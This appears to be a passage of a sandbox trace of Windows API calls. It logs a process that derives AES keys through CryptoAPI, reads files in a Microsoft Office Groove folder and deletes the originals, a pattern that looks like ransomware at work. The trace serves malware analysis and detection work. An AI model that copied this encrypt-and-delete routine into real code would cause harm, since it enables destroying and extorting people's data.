Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.363] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.363] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.364] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.364] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x35d [0171.364] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.375] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.375] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.375] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.377] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_increaseindent.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_increaseindent.gif")) returned 1 [0171.378] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.379] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.379] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.379] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.379] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x352 [0171.379] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.388] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.388] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.388] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.390] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_justify.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_justify.gif")) returned 1 [0171.392] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.393] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.393] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.393] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.393] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x373 [0171.393] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.397] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.397] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.397] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.398] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_pressed.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_pressed.gif")) returned 1 [0171.401] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.402] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.402] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.402] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.402] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xefe7 [0171.402] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.419] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.419] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.419] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.421] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\utilityfunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\utilityfunctions.js")) returned 1 [0171.424] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.425] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.425] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.425] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.425] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x75aa [0171.425] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.452] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.452] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.452] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.454] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\validation.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\validation.js")) returned 1 [0171.456] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.456] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.456] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.456] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.456] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0171.457] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.458] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.458] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.458] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.459] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\_HELP.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\_help.txt")) returned 1 [0171.494] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0171.502] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.503] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.503] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.503] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.503] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x140b [0171.503] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.517] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.517] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.517] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.519] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\briefcaseicon.jpg")) returned 1 [0171.521] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.522] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.522] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.522] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.522] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf76 [0171.522] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.533] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.533] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.533] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.534] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\BriefcaseIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\briefcaseiconmask.bmp")) returned 1 [0171.541] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.542] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.542] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.542] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.542] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x32cd [0171.542] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.551] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.551] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.551] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.553] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\circleicons.jpg")) returned 1 [0171.554] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.555] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.555] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.555] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.555] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x114c [0171.555] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.563] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.563] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.563] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.565] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\CircleIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\circleiconsmask.bmp")) returned 1 [0171.567] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.567] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.567] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.567] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.568] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x26ba [0171.568] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.574] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.574] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.574] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.576] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\meetingicon.jpg")) returned 1 [0171.577] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.578] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.578] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.578] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.578] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6b8 [0171.578] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.589] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.589] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.589] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.590] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\MeetingIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\meetingiconmask.bmp")) returned 1 [0171.592] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.593] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.593] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.593] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.593] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x19e9 [0171.593] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.604] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.604] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.604] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.606] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projectstatusicons.jpg")) returned 1 [0171.608] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.609] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.609] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.609] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.609] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa10 [0171.609] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.620] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.620] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.620] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.621] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectStatusIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projectstatusiconsmask.bmp")) returned 1 [0171.623] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.623] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.623] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.624] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.624] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x200e [0171.624] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.628] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.628] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.628] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.630] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttaskicon.jpg")) returned 1 [0171.633] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.634] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.634] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.634] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.634] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x79c [0171.634] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.660] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.660] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.660] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.662] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIconMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttaskiconmask.bmp")) returned 1 [0171.672] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0171.672] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0171.674] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0171.679] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0171.680] CryptAcquireContextW (in: phProv=0x32660fc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32660fc*=0xa52810) returned 1 [0171.681] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266100 | out: phHash=0x3266100) returned 1 [0171.681] CryptHashData (hHash=0x284d6e8, pbData=0x2836628, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.681] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x32660f4 | out: phKey=0x32660f4*=0x284d6a8) returned 1 [0171.681] GetFileSize (in: hFile=0x530, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x16c5 [0171.681] ReadFile (in: hFile=0x530, lpBuffer=0x3266174, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266104, lpOverlapped=0x0 | out: lpBuffer=0x3266174*, lpNumberOfBytesRead=0x3266104*=0x80, lpOverlapped=0x0) returned 1 [0171.692] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0171.692] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0171.692] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.693] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\Hierarchy.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\fancy\\hierarchy.js")) returned 1 [0171.695] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.696] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.696] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.696] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.696] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4f0a [0171.696] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.700] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.700] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.700] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.701] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectToolsetIconImages.jpg" (normalized: "c:\\program files\\microsoft 